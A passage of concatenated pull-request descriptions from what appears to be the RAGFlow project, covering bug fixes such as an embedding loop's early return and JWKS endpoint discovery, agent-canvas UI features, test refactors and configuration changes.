the error 'cannot write mode RGBA as JPEG.' This occurs because images
in RGBA mode cannot be directly saved as JPEG. They must be converted
first before saving.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Add new test suite for document app with
create/list/parse/upload/remove tests
- Update API URLs to use version variable from config in HTTP and web
API tests
### Type of change
- [x] Add test cases
### What problem does this PR solve?
Before the refactor:
1. Create the file record.
2. Add the file to blob storage.
If an exception occurs at step 2, the system database holds a file
record with no related blob, which can introduce bugs.
After the refactor:
1. Add the file to blob storage.
2. Create the file record.
If step 1 succeeds but step 2 fails, only an orphaned blob remains in
blob storage, which the user will not notice.
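A minimal sketch of the new ordering, using in-memory stand-ins. The classes `InMemoryBlobStore` and `InMemoryFileTable` and the function `upload_file` are hypothetical and exist only to illustrate the idea; they are not the project's storage or database layer.

```python
class InMemoryBlobStore:
    """Hypothetical stand-in for the blob storage backend."""

    def __init__(self):
        self.blobs = {}

    def put(self, key, data):
        self.blobs[key] = data


class InMemoryFileTable:
    """Hypothetical stand-in for the file table in the system database."""

    def __init__(self, fail=False):
        self.records = {}
        self.fail = fail  # simulate a database error when True

    def insert(self, key, meta):
        if self.fail:
            raise RuntimeError("database insert failed")
        self.records[key] = meta


def upload_file(blob_store, file_table, key, data):
    # Step 1: write the blob first.
    blob_store.put(key, data)
    # Step 2: create the record only after the blob exists, so a record
    # never points at a missing blob.
    file_table.insert(key, {"size": len(data)})
```

If step 2 raises, the worst case is an unreferenced blob; no user-visible record exists without its content.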
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Delete the agent and tool nodes downstream of the agent node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
image_version: v0.19.1
This PR fixes a bug in the HuggingFaceEmbed API method that was
causing AssertionError: assert len(vects) == len(docs) during the
document embedding process.
#### Problem
The HuggingFaceEmbed.encode() method had an early return statement
inside the for loop, causing it to return after processing only the
first text input instead of processing all texts in the input list.
**Error Message**
```python
AssertionError: assert len(vects) == len(docs) # input chunks != embedded vectors from embedding api
File "/ragflow/rag/svr/task_executor.py", line 442, in embedding
```
**Buggy code (/ragflow/rag/llm/embedding_model.py)**
```python
class HuggingFaceEmbed(Base):
    def __init__(self, key, model_name, base_url=None):
        if not model_name:
            raise ValueError("Model name cannot be None")
        self.key = key
        self.model_name = model_name.split("___")[0]
        self.base_url = base_url or "http://127.0.0.1:8080"

    def encode(self, texts: list):
        embeddings = []
        for text in texts:
            response = requests.post(...)
            if response.status_code == 200:
                try:
                    embedding = response.json()
                    embeddings.append(embedding[0])
                    # ❌ Early return
                    return np.array(embeddings), sum([num_tokens_from_string(text) for text in texts])
                except Exception as _e:
                    log_exception(_e, response)
            else:
                raise Exception(...)
```
**Fixed code (this function is rolled back to its v0.19.0 version)**
```python
class HuggingFaceEmbed(Base):
    def __init__(self, key, model_name, base_url=None):
        if not model_name:
            raise ValueError("Model name cannot be None")
        self.key = key
        self.model_name = model_name.split("___")[0]
        self.base_url = base_url or "http://127.0.0.1:8080"

    def encode(self, texts: list):
        embeddings = []
        for text in texts:
            response = requests.post(...)
            if response.status_code == 200:
                embedding = response.json()
                embeddings.append(embedding[0])  # ✅ Only append, no return
            else:
                raise Exception(...)
        return np.array(embeddings), sum([num_tokens_from_string(text) for text in texts])  # ✅ Return after processing all
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Use the message_id returned by the interface as the id of the
reply message #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This is a cherry-pick from #7781 as requested.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Update .env to default to the v0.19.1-slim edition
### Type of change
- [x] Other (please describe): Update .env to default to the
v0.19.1-slim edition
### What problem does this PR solve?
- Simplify AzureChat constructor by passing base_url directly
- Clean up spacing and formatting in chat_model.py
- Remove redundant parentheses and improve code consistency
- #8423
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
### Type of change: Documentation Update/Refactoring
#### Summary
Adds HTTPS/SSL configuration guide/example to enable secure RAGFlow
deployments with proper certificate management.
#### Changes
- New HTTPS Setup Section: Step-by-step guide for SSL certificate
configuration
- Let's Encrypt Integration: Complete Certbot setup instructions
- Docker Configuration: Volume mapping examples for certificates
#### Key Features
- Prerequisites checklist
- Docker Compose configuration examples
- Support for both Let's Encrypt and existing certificates
#### Files Modified
- `README.md`
- `ragflow.https.conf` (new file)
### What problem does this PR solve?
Feat: The delete button is displayed only when the cursor is hovered
over the connection line #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
**Context and Purpose:**
This PR automatically remediates a security vulnerability:
- **Description:** Detected possible formatted SQL query. Use
parameterized queries instead.
- **Rule ID:**
python.lang.security.audit.formatted-sql-query.formatted-sql-query
- **Severity:** HIGH
- **File:** rag/utils/opendal_conn.py
- **Lines Affected:** 98 - 98
This change is necessary to protect the application from potential
security risks associated with this vulnerability.
**Solution Implemented:**
The automated remediation process has applied the necessary changes to
the affected code in `rag/utils/opendal_conn.py` to resolve the
identified issue.
Please review the changes to ensure they are correct and integrate as
expected.
### What problem does this PR solve?
Feat: Solved the conflict between the Handle click and drag events of
the canvas node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#8391 #8404
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add Tavily operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where tag content would overflow the container
#8392
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Improve the tavily form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: code debugging may be corrupted by history answers.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add curl example for interacting with the RAGFlow MCP server. Special
thanks to @writinwaters for his expert refinement.
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <cai.keith@gmail.com>
### What problem does this PR solve?
Feat: Synchronize the data of the tavily form to the canvas node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Deleting the last tool of the agent will delete the tool node
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Save the agent tool data to the node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update Docker image version badges and references from v0.19.0 to
v0.19.1
- Modify version mentions in all localized README files (id, ja, ko,
pt_br, tzh, zh)
- Update version in docker/README.md and related documentation files
- Includes updates to Helm values and Python SDK dependencies
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
- Correct boolean parsing for 'desc' parameter in document_app.py to
properly handle string values
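A short sketch of why string values need explicit parsing. In Python, `bool("false")` is `True` because any non-empty string is truthy. The helper `parse_bool` and the set of accepted spellings are assumptions made for illustration, not the code in document_app.py.

```python
def parse_bool(value, default=True):
    """Parse a query-string style flag into a real boolean.

    Hypothetical helper: the accepted spellings below are an assumption.
    """
    if value is None:
        return default
    if isinstance(value, bool):
        return value
    return str(value).strip().lower() in {"true", "1", "yes"}


# bool("false") is True, which is the kind of mistake explicit parsing avoids.
desc = parse_bool("false")
```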
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes a minor grammar issue in a user-facing error message. The original
message said "large than" instead of the correct comparative form
"larger than". Just a quick fix I noticed while reading the code.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the initial value of the slice method was not
displayed in the dialog box #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
1. rename var
2. update if statement
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add a tool operator node from the agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix illegal variable name in Jinja2. #8316.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix sandbox standalone context error. #8307.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add tool nodes and tool drop-down menu #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add child nodes and their connecting lines by clicking #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Highlight current language in README badges by changing color for
Traditional and Simplified Chinese
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
- Replace hardcoded 255-byte file name length checks with
FILE_NAME_LEN_LIMIT constant
- Update error messages to show the actual limit value
- #8290
### Type of change
- [x] Refactoring
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
- Add validation for empty filenames in document_app.py and trim
whitespace
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add a child operator node by clicking the operator node anchor
point #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the anchor point positioning of the classification operator
node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update readme
### Type of change
- [x] Documentation Update
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
- Add filename length validation (<=255 bytes) for document
upload/rename in both HTTP and SDK APIs
- Update error messages for consistency
- Fix comparison operator in SDK from '>=' to '>' for filename length
check
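The length rule can be sketched as below. The function name `validate_file_name`, the error text, and the choice of UTF-8 for measuring bytes are assumptions; only the 255-byte limit and the `>` comparison come from the description above.

```python
FILE_NAME_LEN_LIMIT = 255  # bytes, as stated in the PR description


def validate_file_name(name):
    """Return an error message, or None when the name is acceptable.

    Hypothetical helper; UTF-8 byte length is an assumption.
    """
    name_bytes = len(name.encode("utf-8"))
    # Use '>' rather than '>=' so a name of exactly 255 bytes is allowed.
    if name_bytes > FILE_NAME_LEN_LIMIT:
        return f"File name must be {FILE_NAME_LEN_LIMIT} bytes or less."
    return None
```

Measuring bytes rather than characters matters for non-ASCII names: 128 two-byte characters already exceed the limit.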
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Use the node ID as the key to destroy different types of form
components to switch the form values of the same type of operators
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the parameters could not be set after
switching the large model parameter template. #8282
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add documentation of authorization header for MCP server based on OAuth
2.1
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### Description
This PR introduces two new environment variables, `DOC_BULK_SIZE` and
`EMBEDDING_BATCH_SIZE`, to allow flexible tuning of batch sizes for
document parsing and embedding vectorization in RAGFlow. By making these
parameters configurable, users can optimize performance and resource
usage according to their hardware capabilities and workload
requirements.
### What problem does this PR solve?
Previously, the batch sizes for document parsing and embedding were
hardcoded, limiting the ability to adjust throughput and memory
consumption. This PR enables users to set these values via environment
variables (in `.env`, Helm chart, or directly in the deployment
environment), improving flexibility and scalability for both small and
large deployments.
- `DOC_BULK_SIZE`: Controls how many document chunks are processed in a
single batch during document parsing (default: 4).
- `EMBEDDING_BATCH_SIZE`: Controls how many text chunks are processed
in a single batch during embedding vectorization (default: 16).
This change updates the codebase, documentation, and configuration files
to reflect the new options.
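A minimal sketch of how such settings might be read and applied. The helper names `read_positive_int` and `batched` are hypothetical, and the fallback-on-invalid-value behavior is an assumption; only the variable names and defaults come from the description above.

```python
import os


def read_positive_int(name, default):
    """Read a positive integer from the environment, falling back to default.

    Hypothetical helper; falling back on invalid input is an assumption.
    """
    raw = os.environ.get(name)
    if raw is None or not raw.strip():
        return default
    try:
        value = int(raw)
    except ValueError:
        return default
    return value if value > 0 else default


def batched(items, size):
    """Yield consecutive slices of at most `size` items."""
    for start in range(0, len(items), size):
        yield items[start:start + size]


DOC_BULK_SIZE = read_positive_int("DOC_BULK_SIZE", 4)
EMBEDDING_BATCH_SIZE = read_positive_int("EMBEDDING_BATCH_SIZE", 16)
```

Larger batches generally trade memory for throughput, so the right values depend on the hardware in use.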
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
### Additional context
- Updated `.env`, `helm/values.yaml`, and documentation to describe
the new variables.
- Modified relevant code paths to use the environment variables instead
of hardcoded values.
- Users can now tune these parameters to achieve better throughput or
reduce memory usage as needed.
Before:
Default value:
<img width="643" alt="image"
src="https://github.com/user-attachments/assets/086e1173-18f3-419d-a0f5-68394f63866a"
/>
After:
10x:
<img width="777" alt="image"
src="https://github.com/user-attachments/assets/5722bbc0-0bcb-4536-b928-077031e550f1"
/>
### What problem does this PR solve?
Fix mixing different embedding models in document parsing.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
This PR fixes two issues in the OpenDAL storage connector:
1. The `health` method was missing, which prevented health checks on
the storage backend.
2. The initialization of the `opendal.Operator` object included a
redundant scheme parameter, causing unnecessary duplication and
potential confusion.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Background
- The absence of a `health` method made it difficult to verify the
availability and reliability of the storage service.
- Initializing `opendal.Operator` with both `self._scheme` and
unpacked `**self._kwargs` could lead to errors or unexpected behavior
if the scheme was already included in the kwargs.
### What is changed and how it works?
- Adds a `health` method that writes a test file to verify storage
availability.
- Removes the duplicate scheme parameter from the `opendal.Operator`
initialization to ensure clarity and prevent conflicts.
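The sketch below illustrates both changes with a stand-in class. `FakeOperator` is hypothetical and is not the real `opendal.Operator`. In plain Python, passing `scheme` positionally while it is also present in the unpacked kwargs raises a `TypeError`; whether the real operator fails in exactly this way is not confirmed here.

```python
class FakeOperator:
    """Hypothetical stand-in for a storage operator."""

    def __init__(self, scheme, **options):
        self.scheme = scheme
        self.options = options
        self.files = {}

    def write(self, path, data):
        self.files[path] = data


kwargs = {"scheme": "mysql", "table": "files"}

# Before: FakeOperator("mysql", **kwargs) passes `scheme` twice and raises TypeError.
# After: let the kwargs carry the scheme on their own.
op = FakeOperator(**kwargs)


def health(operator):
    """Write a small test file to check that the backend accepts writes."""
    operator.write("health_check", b"ok")
    return True
```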
before:
<img width="762" alt="企业微信截图_46be646f-2e99-4e5e-be67-b1483426e77c"
src="https://github.com/user-attachments/assets/acecbb8c-4810-457f-8342-6355148551ba"
/>
<img width="767" alt="image"
src="https://github.com/user-attachments/assets/147cd5a2-dde3-466b-a9c1-d1d4f0819e5d"
/>
after:
<img width="1123" alt="企业微信截图_09d62997-8908-4985-b89f-7a78b5da55ac"
src="https://github.com/user-attachments/assets/97dc88c9-0f4e-4d77-88b3-cd818e8da046"
/>
### What problem does this PR solve?
Feat: Reset the default values of large model parameters
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the style of the canvas operator node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update all test file creation functions to use English text instead of
Chinese for consistency with the project's language standards. This
includes DOCX, Excel, PPT, PDF, TXT, MD, JSON, EML, and HTML test file
generators.
### Type of change
- [x] Update test case
### What problem does this PR solve?
Progress is only updated if it's valid and not regressive.
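One way to express this guard is sketched below. The function `next_progress` is hypothetical, and treating "valid" as a number between 0 and 1 is an assumption; the actual validity rule in the task executor may differ.

```python
def next_progress(current, proposed):
    """Return the progress value to store.

    Hypothetical helper. "Valid" is assumed to mean a number in [0, 1];
    the real rule may differ.
    """
    if isinstance(proposed, bool) or not isinstance(proposed, (int, float)):
        return current  # not a number: ignore the update
    if not 0.0 <= proposed <= 1.0:
        return current  # out of range (also rejects NaN): ignore
    if proposed < current:
        return current  # regressive update: keep the higher value
    return proposed
```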
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Add query references to "RewriteQuestion:AllNightsSniff" in multiple
components
- Set "selected" to false for retrieval node
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add canvas node toolbar #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Implement RAGFlowWebApiAuth class for web API authentication
- Add comprehensive test cases for KB CRUD operations
- Set up common fixtures and utilities in conftest.py
- Add helper functions in common.py for web API requests
The changes establish a complete testing framework for knowledge base
management via web API endpoints.
### Type of change
- [x] Add test case
### What problem does this PR solve?
Get rid of 'RedisDB.get_unacked_iterator queue rag_flow_svr_queue_1
doesn't exist'
----
Edit: revert to original message collection logic.
### Type of change
- [x] Refactoring
---------
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
This PR resolves the inconsistency in the opendal configuration where
both `schema` and `scheme` were used as keys. The code and
configuration file now consistently use `scheme`, which helps prevent
configuration errors and runtime issues. This change improves code
clarity and maintainability.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Additional context
- Updated both `conf/service_conf.yaml` and
`rag/utils/opendal_conn.py` to use `scheme` instead of `schema`
- No breaking changes to other configuration fields
### What problem does this PR solve?
Fix the restriction of forcing similarity_threshold=0 and page_size=30
when doc_ids is not empty
#8228
---------
Co-authored-by: shiqing.wusq <shiqing.wusq@dtzhejiang.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Resolves the error "Can't inference the where the component input is.
Please identify whose output is this component's input" that was
reported when creating an Agent from the Customer service template.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Change allocate_container_blocking to calculate elapsed time using async time.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Connect conditional operators to other operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Fix boolean parsing for 'desc' parameter in kb_app.py to properly
handle string values
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR investigates the cause of #7957.
TL;DR: Incorrect similarity calculations lead to too many candidates.
Since candidate selection involves interaction with the LLM, this causes
significant delays in the program.
What this PR does:
1. **Fix similarity calculation**:
When processing a 64-page government document, the corrected similarity
calculation reduces the number of candidates from over 100,000 to around
16,000. With a default batch size of 100 pairs per LLM call, this fix
reduces unnecessary LLM interactions from over 1,000 calls to around
160, a roughly 10x improvement.
2. **Add concurrency and timeout limits**:
Up to 5 entity types are processed in "parallel", each with a 180-second
timeout. These limits may be configurable in future updates.
3. **Improve logging**:
The candidate resolution process now reports progress in real time.
4. **Mitigate potential concurrency risks**
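The concurrency and timeout limits in item 2 can be sketched with a semaphore and a per-task timeout. This sketch uses `asyncio`, which is an assumption about the runtime; `resolve_all` and `resolve_one` are hypothetical names, and only the limits of 5 and 180 seconds come from the description above.

```python
import asyncio

MAX_CONCURRENT_TYPES = 5   # from the PR description
PER_TYPE_TIMEOUT_S = 180   # from the PR description


async def resolve_all(entity_types, resolve_one,
                      limit=MAX_CONCURRENT_TYPES, timeout=PER_TYPE_TIMEOUT_S):
    """Run resolve_one for each entity type, at most `limit` at a time."""
    semaphore = asyncio.Semaphore(limit)

    async def guarded(entity_type):
        async with semaphore:
            try:
                # The timeout starts once a slot has been acquired.
                result = await asyncio.wait_for(resolve_one(entity_type), timeout)
                return entity_type, result
            except asyncio.TimeoutError:
                # A timed-out type yields None instead of failing the whole run.
                return entity_type, None

    pairs = await asyncio.gather(*(guarded(t) for t in entity_types))
    return dict(pairs)
```

Returning `None` for a timed-out type is a design choice of this sketch; the PR does not say how timeouts are reported.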
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
- Move common constants (HOST_ADDRESS, INVALID_API_TOKEN, etc.) to
configs.py
- Update test imports to use centralized configs
- Clean up duplicate constant definitions across test files
This improves maintainability by centralizing configuration.
### Type of change
- [x] Refactoring test case
### What problem does this PR solve?
- Fix test assertions in test_delete_chunks.py to expect empty results
after deletion
Action 7619
### Type of change
- [x] Bug Fix test cases
### What problem does this PR solve?
Feat: Display the connection lines between multiple conditions of the
conditional operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Remove pagerank from CreateDatasetReq and add to UpdateDatasetReq
- Add pagerank update logic in dataset update endpoint
- Update API documentation to reflect changes
- Modify related test cases and SDK references
#8208
This change makes pagerank a mutable property that can only be set after
dataset creation, and only when using elasticsearch as the doc engine.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Validate that pagerank updates are only allowed when using elasticsearch
as the document engine. Return an error if pagerank is set while using a
different doc engine, preventing potential inconsistencies in document
scoring.
#8208
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8157
The current master code should work fine, but I have some warnings, so I
added a declaration to address them.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: The value selected in the Select component only displays the icon
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#8074
OSS: support OpenDAL (including MySQL)
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Validate dataset name in knowledge base update endpoint to ensure:
- Name is a non-empty string
- Name length doesn't exceed DATASET_NAME_LIMIT
- Whitespace is trimmed before processing
Prevents invalid dataset names from being saved and provides clear error
messages.
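The three checks above can be sketched as follows. The function name, the error messages, and the limit value of 128 are assumptions for illustration; the real `DATASET_NAME_LIMIT` is defined in the codebase, and whether it counts characters or bytes is not stated here.

```python
DATASET_NAME_LIMIT = 128  # hypothetical value; the real constant lives in the codebase


def validate_dataset_name(name):
    """Return the trimmed name, or raise ValueError with a clear message.

    Hypothetical helper; length is counted in characters as an assumption.
    """
    if not isinstance(name, str):
        raise ValueError("Dataset name must be a string.")
    name = name.strip()  # trim before any other check
    if not name:
        raise ValueError("Dataset name can't be empty.")
    if len(name) > DATASET_NAME_LIMIT:
        raise ValueError(
            f"Dataset name length is {len(name)}, which is larger than {DATASET_NAME_LIMIT}."
        )
    return name
```

Trimming first means a name made only of spaces is reported as empty rather than stored.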
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix auto-keyword and auto-question fail with qwq model. #8189
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add SwitchForm component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Change the condition from checking for >1 to >=1 when validating
duplicate knowledgebase names to properly catch all duplicates. This
ensures no two knowledgebases can have the same name for a tenant.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Trim whitespace before checking for empty dataset names
- Change length check from >= to > DATASET_NAME_LIMIT for consistency
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add Qwen3-Embedding text-embedding-v4.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Rename `api_key` fixture to `HttpApiAuth` across all test files
- Update all dependent fixtures and test cases to use new naming
- Maintain same functionality while improving naming clarity
The rename better reflects the fixture's purpose as an HTTP API
authentication helper rather than just an API key.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
- Update chat assistant tests to use dataset.id directly in payloads
- Enhance document parsing tests with better condition checking
- Add explicit type hints and improve timeout handling
Action_7556
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display the agent node running timeline #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display agent operator call log #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Enhanced the image rotation handling by evaluating the original
orientation, clockwise 90°, and counter-clockwise 90° rotations. The
image with the highest text recognition score is now selected, improving
accuracy for text detection in images with aspect ratios >= 1.5.
#8166
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wenrui.cao <wenrui.cao@univers.com>
### What problem does this PR solve?
Fixes the following deprecation warning emitted from `download_deps.py`:
```
UserWarning: `local_dir_use_symlinks` parameter is deprecated and will be ignored. The process to download files to a local folder has been updated and do not rely on symlinks anymore. You only need to pass a destination folder as`local_dir`
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Improve robustness of Jina, Nvidia, and SILICONFLOW embedding models by:
1. Adding try-catch blocks for JSON decode errors
2. Logging error details including response content
3. Raising exceptions with meaningful error messages
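The three steps above might look like the sketch below. The function `parse_embedding_response` is hypothetical, and the response shape `{"data": [{"embedding": [...]}]}` is an assumption; the actual providers' payloads may differ.

```python
import json
import logging


def parse_embedding_response(body, status_code=200):
    """Extract embedding vectors from a JSON response body.

    Hypothetical helper; the payload shape is an assumption.
    """
    try:
        payload = json.loads(body)
        return [item["embedding"] for item in payload["data"]]
    except (json.JSONDecodeError, KeyError, TypeError) as exc:
        # Log the (truncated) response content so the failure can be diagnosed.
        logging.error(
            "Embedding response could not be parsed (status %s): %r",
            status_code, body[:200],
        )
        # Raise with a message that names the real problem.
        raise ValueError(f"Invalid embedding response: {exc}") from exc
```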
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Let system variables appear in operator prompts #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Replace manual venv activation with `uv run` for pytest commands
- Add dynamic test level (p2/p3) based on GitHub event type
- Simplify test commands by removing redundant directory changes
### Type of change
- [x] Update Action
### What problem does this PR solve?
For the kb.app list method, the total was calculated incorrectly when
owner_ids was given (the total is now calculated from the paged result).
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Constructing query parameter options for the Retrieval operator
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Issue: #8051
The current implementation assumes JWKS endpoints follow the standard
`/.well-known/jwks.json` convention. This breaks authentication for OIDC
providers that use non-standard JWKS paths, resulting in 404 errors
during token validation.
### Root Cause Analysis
- The OpenID Connect specification doesn't mandate a fixed path for JWKS
endpoints
- Some identity providers (like certain Keycloak configurations) use
custom endpoints
- Our previous approach constructed JWKS URLs by convention rather than
discovery
### Solution Approach
Instead of constructing JWKS URLs by appending to the issuer URI, we
now:
1. Properly leverage the `jwks_uri` from the OIDC discovery metadata
2. Honor the identity provider's actual configured endpoint
```python
# Before (fragile approach)
jwks_url = f"{self.issuer}/.well-known/jwks.json"
# After (standards-compliant)
jwks_cli = jwt.PyJWKClient(self.jwks_uri) # Use discovered endpoint
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR aims to solve #8120, which requests a better error display for
duplicate column names.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add agent operator node from agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Consolidate HTTP API test fixtures using batch operations
(batch_add_chunks, batch_create_chat_assistants)
- Fix fixture initialization order in clear_session_with_chat_assistants
- Add new SDK API test suite for session management
(create/delete/list/update)
### Type of change
- [x] Add test cases
- [x] Refactoring
### What problem does this PR solve?
Feat: Display chat content on the agent page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Convert the prompt field of the agent operator to an array #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Implement new SDK API test cases for chat assistant CRUD operations
- Enhance HTTP API concurrent tests to use as_completed for better
reliability
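The `as_completed` pattern can be sketched as follows. `create_assistant` is a hypothetical stand-in for a real API call, and `run_concurrently` is an illustrative helper rather than the test suite's own code.

```python
from concurrent.futures import ThreadPoolExecutor, as_completed


def create_assistant(index):
    """Hypothetical stand-in for an HTTP call that creates a chat assistant."""
    return {"code": 0, "name": f"assistant_{index}"}


def run_concurrently(func, count, max_workers=5):
    """Submit `count` calls and collect results as each one finishes."""
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        futures = [executor.submit(func, i) for i in range(count)]
        # future.result() re-raises any exception from the worker, so a
        # failed request fails the test instead of being silently dropped.
        return [future.result() for future in as_completed(futures)]
```

Results arrive in completion order, so assertions should not depend on the order in which requests were submitted.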
### Type of change
- [x] Add test cases
- [x] Refactoring
### What problem does this PR solve?
- Consolidate database operations within single try-except blocks in the
methods
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Support skipping the attribute check when the upstream has already
performed it.
### Type of change
- [X] Performance Improvement
### What problem does this PR solve?
Previously when LLM.model_name was not configured:
- System incorrectly defaulted to 'deepseek-chat' model
- This caused permission errors for unauthorized tenants
Now:
- Use tenant's default chat_model configuration first
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Previously when LLM.rerank_model was not configured:
- SDK would pass None as the value
